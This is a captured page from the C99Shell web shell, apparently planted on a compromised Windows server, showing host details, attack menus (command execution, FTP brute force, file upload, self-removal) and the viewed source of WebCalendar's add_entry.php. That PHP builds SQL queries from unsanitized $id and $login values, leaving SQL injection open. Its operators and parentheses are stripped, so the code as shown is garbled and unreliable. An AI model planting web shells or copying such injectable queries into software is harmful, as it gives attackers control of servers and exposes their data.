!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\nuevo\WebCalendar-1.0.2\   drwxrwxrwx
Free 7.96 GB of 239.26 GB (3.33%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     add_entry.php (1.36 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once 'includes/init.php';
load_user_categories();

$error "";

// Only proceed if id was passed
if ( $id ) {

  // double check to make sure user doesn't already have the event
  $is_my_event false;
  $sql "SELECT cal_id FROM webcal_entry_user " .
    "WHERE cal_login = '$login' AND cal_id = $id";
  $res dbi_query $sql );
  if ( $res ) {
    $row dbi_fetch_row $res );
    if ( $row[0] == $id ) {
      $is_my_event true;
      echo "Event # " $id " is already on your calendar.";
      exit;
    }
    dbi_free_result $res );
  }

  // Now lets make sure the user is allowed to add the event (not private)

  $sql "SELECT cal_access FROM webcal_entry WHERE cal_id = " $id;
  $res dbi_query $sql );
  if ( ! $res ) {
    echo translate("Invalid entry id") . ": $id";
    exit;
  }
  $row dbi_fetch_row $res );

  if ( $row[0] == "R" && ! $is_my_event ) {
    $is_private true;
    etranslate("This is a private event and may not be added to your calendar.");
    exit;
  } else {
    $is_private false;
  }

  // add the event
  if ( $readonly == "N" && ! $is_my_event && ! $is_private )  {
    if ( ! dbi_query "INSERT INTO webcal_entry_user ( cal_id, cal_login, cal_status ) VALUES ( $id, '$login', 'A' )") ) {
      $error translate("Error adding event") . ": " dbi_error ();
    }
  }
}

send_to_preferred_view ();
exit;
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--